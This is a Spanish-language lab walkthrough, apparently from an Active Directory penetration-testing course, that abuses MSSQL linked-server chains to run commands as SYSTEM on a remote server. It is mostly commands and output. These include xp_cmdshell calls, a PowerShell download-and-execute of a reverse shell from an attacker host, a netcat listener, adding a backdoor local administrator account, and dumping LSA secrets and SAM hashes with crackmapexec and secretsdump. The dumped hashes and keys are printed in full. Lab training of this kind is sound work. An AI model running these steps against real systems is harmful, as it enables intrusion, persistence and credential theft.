Learning Objective - 22
MSSQL Servers
Descubriendo SPNs.
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLInstanceDomain
ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local
Instance : dcorp-mgmt.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123394400
DomainAccount : svcadmin
DomainAccountCn : svc admin
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
LastLogon : 1/10/2024 3:22 AM
Description : Account to be used for services which need high privileges.
ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local
Instance : dcorp-mgmt.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123394400
DomainAccount : svcadmin
DomainAccountCn : svc admin
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local
LastLogon : 1/10/2024 3:22 AM
Description : Account to be used for services which need high privileges.
ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : dcorp-mssql.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123385400
DomainAccount : DCORP-MSSQL$
DomainAccountCn : DCORP-MSSQL
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local:1433
LastLogon : 3/5/2024 11:56 AM
Description :
ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : dcorp-mssql.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123385400
DomainAccount : DCORP-MSSQL$
DomainAccountCn : DCORP-MSSQL
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local
LastLogon : 3/5/2024 11:56 AM
Description :
ComputerName : dcorp-sql1.dollarcorp.moneycorp.local
Instance : dcorp-sql1.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123386400
DomainAccount : DCORP-SQL1$
DomainAccountCn : DCORP-SQL1
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local:1433
LastLogon : 3/5/2024 11:56 AM
Description :
ComputerName : dcorp-sql1.dollarcorp.moneycorp.local
Instance : dcorp-sql1.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123386400
DomainAccount : DCORP-SQL1$
DomainAccountCn : DCORP-SQL1
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local
LastLogon : 3/5/2024 11:56 AM
Description :
Verificando acceso a los servicios.
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
VERBOSE: Creating runspace pool and session states
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: DCORP-STD723 : Connection Failed.
VERBOSE: Closing the runspace pool
ComputerName Instance Status
------------ -------- ------
dcorp-mgmt.dollarcorp.moneycorp.local dcorp-mgmt.dollarcorp.moneycorp.local Not Accessible
dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local,1433 Accessible
dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local Accessible
dcorp-mgmt.dollarcorp.moneycorp.local dcorp-mgmt.dollarcorp.moneycorp.local,1433 Not Accessible
dcorp-sql1.dollarcorp.moneycorp.local dcorp-sql1.dollarcorp.moneycorp.local Not Accessible
dcorp-sql1.dollarcorp.moneycorp.local dcorp-sql1.dollarcorp.moneycorp.local,1433 Not Accessible
DCORP-STD723 DCORP-STD723 Not Accessible
Recolectamos informacion de los servicios a los cuales tenemos acceso.
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed.
ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : DCORP-MSSQL
DomainName : dcorp
ServiceProcessID : 1976
ServiceName : MSSQLSERVER
ServiceAccount : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Developer Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : dcorp\student723
IsSysadmin : No
ActiveSessions : 1
ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : DCORP-MSSQL
DomainName : dcorp
ServiceProcessID : 1976
ServiceName : MSSQLSERVER
ServiceAccount : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Developer Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : dcorp\student723
IsSysadmin : No
ActiveSessions : 1
Buscando enlaces al un servicio remoto de MSSQL.
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLink -Instance dcorp-mssql -Verbose
VERBOSE: dcorp-mssql : Connection Success.
ComputerName : dcorp-mssql
Instance : dcorp-mssql
DatabaseLinkId : 0
DatabaseLinkName : DCORP-MSSQL
DatabaseLinkLocation : Local
Product : SQL Server
Provider : SQLNCLI
Catalog :
LocalLogin :
RemoteLoginName :
is_rpc_out_enabled : True
is_data_access_enabled : False
modify_date : 11/14/2022 4:46:10 AM
ComputerName : dcorp-mssql
Instance : dcorp-mssql
DatabaseLinkId : 1
DatabaseLinkName : DCORP-SQL1
DatabaseLinkLocation : Remote
Product : SQL Server
Provider : SQLNCLI
Catalog :
LocalLogin :
RemoteLoginName :
is_rpc_out_enabled : False
is_data_access_enabled : True
modify_date : 12/4/2022 5:16:19 AM
Enumerando enlaces de manera recursiva.
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-MSSQL
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL
VERBOSE: - Link Login: dcorp\student723
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: DCORP-SQL1
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-SQL1
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1
VERBOSE: - Link Login: dblinkuser
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: DCORP-MGMT
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-MGMT
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT
VERBOSE: - Link Login: sqluser
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: EU-SQL37.EU.EUROCORP.LOCAL
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: EU-SQL37
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-SQL37.EU.EUROCORP.LOCAL
VERBOSE: - Link Login: sa
VERBOSE: - Link IsSysAdmin: 1
VERBOSE: - Link Count: 0
VERBOSE: - Links on this server:
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student723
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL37.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL37
CustomQuery :
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User : sa
Links :
Luego ejecutamos comandos con el siguiente comando:
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget eu-sql37
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student723
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL37.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL37
CustomQuery : {nt authority\system, }
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User : sa
Links :
Probamos desde el uso de powershell.
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'powershell.exe -c ""whoami""'" -QueryTarget eu-sql37
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student723
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL37.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL37
CustomQuery : {nt authority\system, }
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User : sa
Links :Luego Ejecutamos una reverse shell como ya lo hicimos antes pero esta vez usaremos otro metodo de descarga por powershell.
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'powershell.exe -c ""iex (iwr -UseBasicParsing http://172.16.100.23:8080/Invoke-PowerShellTcp.ps1)""'" -QueryTarget eu-sql37
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student723
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL37.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL37
CustomQuery :
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User : sa
Links :
En nuestra otra terminal escuchamos en el puerto seteado y obtenemos shell.
C:\AD\Tools\netcat-win32-1.12>.\nc.exe -lvp 6969
listening on [any] 6969 ...
172.16.15.17: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [172.16.100.23] from (UNKNOWN) [172.16.15.17] 56047: NO_DATA
Windows PowerShell running as user SYSTEM on EU-SQL37
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32> hostname
eu-sql37
PS C:\Windows\system32>Ahora intentaremos ver la informacion del dominio actual.
PS C:\> Invoke-WebRequest -Uri "http://172.16.100.23:8080/PowerView.ps1" -OutFile "PowerView.ps1"
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/8/2021 1:15 AM PerfLogs
d-r--- 11/14/2022 7:42 PM Program Files
d----- 11/14/2022 7:41 PM Program Files (x86)
d-r--- 11/15/2022 1:49 AM Users
d----- 1/10/2024 5:38 AM Windows
-a---- 3/6/2024 6:11 AM 924339 PowerView.ps1
PS C:\> . .\PowerView.ps1
PS C:\> Get-DomainComputer | select samaccountname
samaccountname
--------------
EU-DC$
EU-SQL37$
PS C:\> Get-DomainUser | select samaccountname
samaccountname
--------------
Administrator
Guest
krbtgt
dbadmin
PS C:\> Get-DomainTrust
SourceName : eu.eurocorp.local
TargetName : eurocorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 5:49:08 AM
WhenChanged : 2/20/2024 7:48:15 AM
PS C:\> Get-Forest
RootDomainSid : S-1-5-21-3333069040-3914854601-3606488808
Name : eurocorp.local
Sites : {Default-First-Site-Name}
Domains : {eurocorp.local, eu.eurocorp.local}
GlobalCatalogs : {eurocorp-dc.eurocorp.local, eu-dc.eu.eurocorp.local}
ApplicationPartitions : {DC=ForestDnsZones,DC=eurocorp,DC=local, DC=DomainDnsZones,DC=eu,DC=eurocorp,DC=local,
DC=DomainDnsZones,DC=eurocorp,DC=local}
ForestModeLevel : 7
ForestMode : Unknown
RootDomain : eurocorp.local
Schema : CN=Schema,CN=Configuration,DC=eurocorp,DC=local
SchemaRoleOwner : eurocorp-dc.eurocorp.local
NamingRoleOwner : eurocorp-dc.eurocorp.local
PS C:\> Get-DomainComputer -Domain eurocorp.local | select samaccountname
samaccountname
--------------
EUROCORP-DC$
PS C:\> Get-DomainUser -Domain eurocorp.local | select samaccountname
samaccountname
--------------
Administrator
Guest
krbtgt
PS C:\> Get-DomainTrust -Domain eurocorp.local
SourceName : eurocorp.local
TargetName : eu.eurocorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 5:49:08 AM
WhenChanged : 2/20/2024 7:48:14 AM
SourceName : eurocorp.local
TargetName : dollarcorp.moneycorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 8:15:23 AM
WhenChanged : 2/20/2024 7:50:52 AM
Tambien verificamos que tenemos acceso al computador desde nuestro PC.
PS C:\AD\Tools\PowerUpSQL-master> nslookup EU-SQL37.EU.EUROCORP.LOCAL
Server: UnKnown
Address: 172.16.2.1
Non-authoritative answer:
Name: EU-SQL37.EU.EUROCORP.LOCAL
Address: 172.16.15.17
PS C:\AD\Tools\PowerUpSQL-master> ping 172.16.15.17
Pinging 172.16.15.17 with 32 bytes of data:
Reply from 172.16.15.17: bytes=32 time=5ms TTL=127
Reply from 172.16.15.17: bytes=32 time=4ms TTL=127
Ping statistics for 172.16.15.17:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 4ms, Maximum = 5ms, Average = 4msHaciendo persistencia media mañosa XD
PS C:\Windows\system32> net user bombitaeu Password123! /add
The command completed successfully.
PS C:\Windows\system32> net localgroup administrators bombitaeu /add
The command completed successfully.
PS C:\Windows\system32> net user bombitaeu
User name bombitaeu
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/6/2024 6:34:21 AM
Password expires 4/17/2024 6:34:21 AM
Password changeable 3/7/2024 6:34:21 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
PS C:\Windows\system32>Dumpeamos lo que podamos.
crackmapexec smb 172.16.15.17 -u 'bombitaeu' -p 'Password123!' -d '.' --lsa
SMB 172.16.15.17 445 EU-SQL37 [*] Windows 10.0 Build 20348 x64 (name:EU-SQL37) (domain:.) (signing:False) (SMBv1:False)
SMB 172.16.15.17 445 EU-SQL37 [+] .\bombitaeu:Password123! (Pwn3d!)
SMB 172.16.15.17 445 EU-SQL37 [+] Dumping LSA secrets
SMB 172.16.15.17 445 EU-SQL37 EU.EUROCORP.LOCAL/dbadmin:$DCC2$10240#dbadmin#e1dfb4e157d2d93cbad84aa6337579ab
SMB 172.16.15.17 445 EU-SQL37 EU\EU-SQL37$:aes256-cts-hmac-sha1-96:b99144ff967bbd816cd8e023b085a946f6da5c5c6257ff259fd9ff97864a25cc
SMB 172.16.15.17 445 EU-SQL37 EU\EU-SQL37$:aes128-cts-hmac-sha1-96:2ac9e69575c067f8e98d34d42cab4499
SMB 172.16.15.17 445 EU-SQL37 EU\EU-SQL37$:des-cbc-md5:34046275fe61bf20
SMB 172.16.15.17 445 EU-SQL37 EU\EU-SQL37$:plain_password_hex:30002b00430038005a00550042004a00730045004b002400710071004e0070002300790058003c0074005200580071005d00720065003300280036005700720030005c0024003a0078002d00500078005e0030002e004c006600290069006c0034002900270047005200390020006100210037003e003900600061005f004a0020002400590029004b007a00570075005b006c004100240070005200290043006a004c006500750058004000250037005c003900620077003c00370021006d004400550040003a005400570042005300710068003b00480041002c00310037002f004f007a005f0035006f0069003900
SMB 172.16.15.17 445 EU-SQL37 EU\EU-SQL37$:aad3b435b51404eeaad3b435b51404ee:7e830858b5092628bd7b8a5d48e4b23b:::
SMB 172.16.15.17 445 EU-SQL37 dpapi_machinekey:0xe4ed1312a345ef13927866ae066c3aa659d23ed5
dpapi_userkey:0x66b30ebfe4c144d1df515aec7b43e7c05d91c0bb
SMB 172.16.15.17 445 EU-SQL37 NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
SMB 172.16.15.17 445 EU-SQL37 [+] Dumped 8 LSA secrets to /home/dsds/.cme/logs/EU-SQL37_172.16.15.17_2024-03-06_093844.secrets and /home/dsds/.cme/logs/EU-SQL37_172.16.15.17_2024-03-06_093844.cached
impacket-secretsdump 'bombitaeu@172.16.15.17'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] Target system bootKey: 0x5522f4ec06d0bf5dac89558b5e57206e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cdcfd73ba273d2b6ab67f1fecd83e88e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bombitaeu:1001:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[*] Dumping cached domain logon information (domain/username:hash)
EU.EUROCORP.LOCAL/dbadmin:$DCC2$10240#dbadmin#e1dfb4e157d2d93cbad84aa6337579ab
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
EU\EU-SQL37$:aes256-cts-hmac-sha1-96:b99144ff967bbd816cd8e023b085a946f6da5c5c6257ff259fd9ff97864a25cc
EU\EU-SQL37$:aes128-cts-hmac-sha1-96:2ac9e69575c067f8e98d34d42cab4499
EU\EU-SQL37$:des-cbc-md5:34046275fe61bf20
EU\EU-SQL37$:plain_password_hex:30002b00430038005a00550042004a00730045004b002400710071004e0070002300790058003c0074005200580071005d00720065003300280036005700720030005c0024003a0078002d00500078005e0030002e004c006600290069006c0034002900270047005200390020006100210037003e003900600061005f004a0020002400590029004b007a00570075005b006c004100240070005200290043006a004c006500750058004000250037005c003900620077003c00370021006d004400550040003a005400570042005300710068003b00480041002c00310037002f004f007a005f0035006f0069003900
EU\EU-SQL37$:aad3b435b51404eeaad3b435b51404ee:7e830858b5092628bd7b8a5d48e4b23b:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xe4ed1312a345ef13927866ae066c3aa659d23ed5
dpapi_userkey:0x66b30ebfe4c144d1df515aec7b43e7c05d91c0bb
[*] NL$KM
0000 09 C8 7B C2 96 41 6E CB B2 F6 1B DC 29 5C 39 76 ..{..An.....)\9v
0010 7E A6 22 97 DC D3 BE 6B C3 71 48 71 61 6B B2 B3 ~."....k.qHqak..
0020 D0 D6 E0 48 F0 8B 7D 8B 8B 14 95 05 B4 21 FE 93 ...H..}......!..
0030 28 51 47 F1 26 24 B5 F4 E4 20 B6 AC E5 90 33 02 (QG.&$... ....3.
NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
[*] Cleaning up...
Consultando mediante consultas SQL directamente
Como esta fallando, realizaremos las pruebas desde SQL.
Segundo salto.
Tercer salto.
Ejecutando comandos.
select * from openquery("dcorp-sql1",'select * from openquery("dcorp-mgmt",''select * from openquery("eu-sql37.eu.eurocorp.local",''''select @@version as version;exec master..xp_cmdshell "mkdir C:\test"'''')'')')Luego podemos ver que el directorio test si a sido creado.
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/8/2021 1:15 AM PerfLogs
d-r--- 11/14/2022 7:42 PM Program Files
d----- 11/14/2022 7:41 PM Program Files (x86)
d----- 3/6/2024 7:18 AM test
d-r--- 11/15/2022 1:49 AM Users
d----- 1/10/2024 5:38 AM Windows
-a---- 3/6/2024 6:11 AM 924339 PowerView.ps1
Last updated
